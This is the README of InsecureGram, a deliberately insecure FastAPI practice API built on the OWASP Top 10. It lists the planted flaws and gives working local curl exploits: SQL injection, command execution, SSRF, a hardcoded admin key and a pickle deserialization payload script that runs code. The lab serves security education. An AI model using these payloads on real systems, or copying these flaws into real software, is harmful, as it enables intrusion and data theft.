Welcome to InsecureGram β a deliberately insecure RESTful API built using FastAPI to demonstrate real-world web application vulnerabilities, based on the OWASP Top 10. It is meant for educational and research purposes only.
β οΈ This project is intentionally insecure. Do not deploy this in a production environment.
This API mimics a realistic backend service similar to a social media app. It includes endpoints for:
- User registration and login with JWT
- User profiles and search (SQL injection)
- Command execution
- File upload
- SSRF simulation
- Legacy and admin routes
- open redirection
- Insecure deserialization
- Hardcoded secrets
InsecureGram/
β
βββ app/
β βββ main.py # FastAPI app initialization
β βββ database.py # SQLite DB setup and session handling
β βββ models.py # SQLAlchemy User model
β βββ config.py # Global config and JWT secret key
β βββ dependencies.py # Shared auth logic (get_current_user)
β βββ auth.py # Login and registration endpoints
β βββ users.py # Search, profiles, legacy access
β βββ upload.py # File upload (unsafe mode)
β βββ command.py # Remote command execution (RCE)
β βββ proxy.py # SSRF endpoint
β βββ admin.py # Admin-only data access
β βββ deprecated.py # Legacy endpoint
β βββ redirect.py # open redirection enbpoint
β βββ ssrf_server.py # SSRF internal FastAPI server (optional)
βββ static/uploads/ # Uploaded files
βββ test.db # SQLite DB (created at runtime)
βββ Dockerfile # Docker config
βββ docker-compose.yml # Compose config
βββ README.md # You are here
This project contains examples of the following vulnerabilities:
| # | Vulnerability | Description |
|---|---|---|
| V1 | Admin header-based authentication | Admin API uses static API key in header (X-API-KEY) for endpoints /api/admin/users and /api/admin/deserialize |
| V2 | SQL Injection (SQLi) | Raw SQL query constructed from user input |
| V3 | Hardcoded secrets | SECRET_KEY and admin API key stored in config.py |
| V4 | Open CORS policy | Accepts requests from any origin |
| V5 | JWT with guessable secret | Secret used to sign tokens is weak |
| V6 | Insecure deserialization (pickle) | Admin endpoint loads raw Python pickle |
| V7 | Server-Side Request Forgery (SSRF) | Proxy endpoint makes arbitrary HTTP GET requests |
| V8 | Unsafe file uploads | Allows writing files outside upload dir if unsafe=true |
| V9 | Open Redirect | Redirect endpoint blindly forwards to user-supplied URL |
| V10 | Remote Command Execution (RCE) | /api/cmd/exec executes system commands unsafely |
| V11 | Deprecated API Exposure (/api/v1/users/info) | Legacy API endpoint still active |
from jose import jwt
token = jwt.encode({"sub": "alice", "is_admin": False}, "mysecret", algorithm="HS256")-H "Authorization: Bearer <your_jwt_here>"Hereβs how you can interact with the API using curl:
π Register
curl -i -X POST http://localhost:8000/api/auth/register -H "Content-Type: application/json" \
-d '{"username": "alice", "password": "alice123"}'π Login
curl -i -X POST http://localhost:8000/api/auth/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=alice&password=alice123"curl -i -G http://localhost:8000/api/users/{User_ID} \
-H "Authorization: Bearer <JWT>"curl -i -G http://localhost:8000/api/users/search \
-H "Authorization: Bearer <JWT>" \
--data-urlencode "field=username" --data-urlencode "keyword=' OR 1=1 --"curl -i -X POST http://localhost:8000/api/upload?unsafe=true \
-F "[email protected]" \
-H "Authorization: Bearer <JWT>"curl -i -G http://localhost:8000/api/cmd/exec \
-H "Authorization: Bearer <JWT>" \
--data-urlencode "cmd=whoami"curl -i -G http://localhost:8000/api/proxy \
-H "Authorization: Bearer <JWT>" \
--data-urlencode "url=http://127.0.0.1:9000/read?name=secrets.txt"curl -i -H "Authorization: Bearer <JWT>" \
-H "X-API-KEY: admin123" \
http://localhost:8000/api/admin/usersTo exploit this, first craft a malicious Pickle payload in Python:
exploit_payload.py:
import pickle
import subprocess
payload = pickle.dumps((
subprocess.check_output,
(["whoami"],)
)).hex()
print(payload)Run the script to generate a hexadecimal payload string.
Example output: 8004952f000000000000008c0a73756270726f63657373948c0c636865636b5f6f75747075749493945d948c0677686f616d699461859486942e
Then, send it using curl to the vulnerable endpoint:
curl -i -X POST http://localhost:8000/api/admin/deserialize \
-H "Authorization: Bearer <JWT>" \
-H "X-API-KEY: admin123" \
-H "Content-Type: application/json" \
-d '{"payload": "8004952f000000000000008c0a73756270726f63657373948c0c636865636b5f6f75747075749493945d948c0677686f616d699461859486942e"}'
If successful, the server will execute the command (e.g., whoami) and return the result in the output.
{
"output": "kali\n"
}curl -i -H "Authorization: Bearer <JWT>" \
http://localhost:8000/api/redirect?target=https://evil.comcurl -H "Authorization: Bearer <JWT>" \
http://localhost:8000/api/v1/users/info
Choose one of the following methods to start the API server:
- Step 1: Clone the repository
git clone https://github.com/Osama2012/InsecureGram.git
cd insecuregram- Step 2: Build and run the containers
docker compose up --buildThis will launch the FastAPI application and an SQLite-backed service in a containerized environment.
- Step 3: Access the API
Visit http://localhost:8000/docs in your browser.
Ensure Python 3.12 and pipenv are installed.
- Step 1: Install dependencies
pipenv install- Step 2: Activate the virtual environment
pipenv shell- Step 3: Run the FastAPI server
uvicorn app.main:app --reloadThis project is for educational purposes only. Do not use it against real-world services or expose it publicly. You are fully responsible for any misuse.
- Built using FastAPI + SQLAlchemy
- Inspired by OWASP Top 10
- Maintained by the security research community
- Add logging for audit
- Sanitize file uploads
- Parameterize raw SQL queries
- Improve CORS policy
- Add unit tests